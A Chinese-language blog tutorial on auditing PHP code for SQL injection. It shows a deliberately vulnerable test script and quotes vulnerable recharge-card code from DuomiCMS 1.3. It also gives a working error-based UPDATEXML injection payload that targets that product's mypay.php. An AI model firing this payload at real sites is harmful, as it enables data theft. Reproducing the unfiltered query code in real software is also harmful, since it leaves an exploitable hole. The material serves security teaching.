PHP代码审计SQL注入篇
admin
2023-06-05 13:42:01
0

什么是SQL注入

SQL注入***(SQL Injection),简称注入***,是Web开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。

而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使***者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将***者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了***者精心构造的恶意代码。

SQL注入实例

很多Web开发者没有意识到SQL查询是可以被篡改的,从而把SQL查询当作可信任的命令。殊不知,SQL查询是可以绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能通过SQL查询去运行主机系统级的命令。

下面将通过一些真实的例子来详细讲解SQL注入的方式。

 PHP代码审计SQL注入篇 

测试代码如下:

  1. php
  2. $uid=$_GET['id'];
  3. $sql="SELECT * FROM userinfo where id=$uid";
  4. $conn=mysql_connect ('localhost','root','root');
  5. mysql_select_db("sql",$conn);
  6. $result=mysql_query($sql,$conn);
  7. print_r('当前SQL语句: '.$sql.'
    结果: '
    );
  8. print_r(mysql_fetch_row($result));
  9. ?>
PHP代码审计SQL注入篇 首先我们看一下代码:
  1. $uid=$_GET['id']; //获取GET值
  1. $sql="SELECT * FROM userinfo where id=$uid"; //执行SQL语句
  1. $conn=mysql_connect ('localhost','root','root');
  2. mysql_select_db("sql",$conn); //数据库配配置
  1. $result=mysql_query($sql,$conn); //进行查询SQL语句
  1. print_r('当前SQL语句: '.$sql.'
    结果: '
    );
  2. print_r(mysql_fetch_row($result)); //进行打印输出没有任何的过滤所以利用简单的SQL注入语句就可以直接查询相关需要的信息。
PHP代码审计SQL注入篇 从截图可以看出原本的SQL语句已被注入更改,使用了UNION查询到当前用户。
另外一个多米CMS最新版1.3版本注入实例。漏洞文件member/mypay.php(14-40行)
  1. if(empty($_SESSION['duomi_user_id'])){
  2. showMsg("请先登录","login.php");
  3. exit();
  4. }
  5. elseif($dm=='mypay'){
  6. $key=$_POST['cardkey'];
  7. if($key==""){showMsg("请输入充值卡号","-1");exit;}
  8. $pwd=$_POST['cardpwd'];
  9. if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}
  10. $sqlt="SELECT * FROM duomi_card where ckey='$key'";
  11. $sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";
  12. $row1 = $dsql->GetOne($sqlt);
  13. if(!is_array($row1) OR $row1['status']<>0){
  14. showMsg("充值卡信息有误","-1");exit;
  15. }else{
  16. $uname=$_SESSION['duomi_user_name'];
  17. $points=$row1['climit'];
  18. $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");
  19. $dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");
  20. $dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");
  21. showMsg("恭喜!充值成功!","mypay.php");exit;
  22. }
  23. }
  24. else
  25. {

此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行):
  1. http://localhost/member/mypay.php?dm=mypay
  2. POSTcardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1

PHP代码审计SQL注入篇 


来自为知笔记(Wiz)

相关内容

热门资讯

巴基斯坦消息人士:美伊接近达成... 新华社伊斯兰堡5月23日电(记者杨恺)巴基斯坦官方消息人士23日告诉新华社记者,美国与伊朗接近达成一...
特朗普又说美伊“越来越接近”达... 新华社华盛顿5月23日电(记者黄强 徐剑梅)美国总统特朗普23日说,美国与伊朗的谈判“越来越接近”达...
非洲埃博拉疫情最大缺口:没有任... 当地时间5月23日,非洲疾控中心与世界卫生组织联合召开线上新闻发布会,针对刚果(金)和乌干达本轮暴发...
首位来自香港的航天员为何是她? 5月23日,神舟二十三号乘组名单公布,首位来自香港的航天员黎家盈名列其中。 5月24日晚,她将乘坐神...
原创 携... 前几天吃饭,隔壁桌两个人聊得挺大声,一个说自己用了快10年的号码,前阵子终于转网了,原本还担心麻烦,...
宁夏吴忠举办AIGC项目签约仪... 转自:新华财经 5月22日,宁夏吴忠市AIGC(人工智能生成内容)项目签约仪式暨产业沙龙活动在宁夏人...
2026年618期间手机性价比... 感谢各位的耐心等待,手上的工作暂时告一段落,终于可以腾出时间写文章了。2026年618性价比手机购买...
山西煤矿瓦斯爆炸事故造成82死... 新华社太原5月23日电(记者刘扬涛、原勋)记者从23日晚10点30分许召开的山西通洲集团留神峪煤矿瓦...
告别纸贴手写,会议室预约管理该... "这个会议室下午几点有人?" "不知道,去门口看看有没有贴条。" 这段对话在很多企业的日常里反复上演...
原创 够... 前两天一条新闻刷屏了——时隔54年,人类再次飞向月球。美国“阿耳忒弥斯2号”载人绕月任务发射升空,四...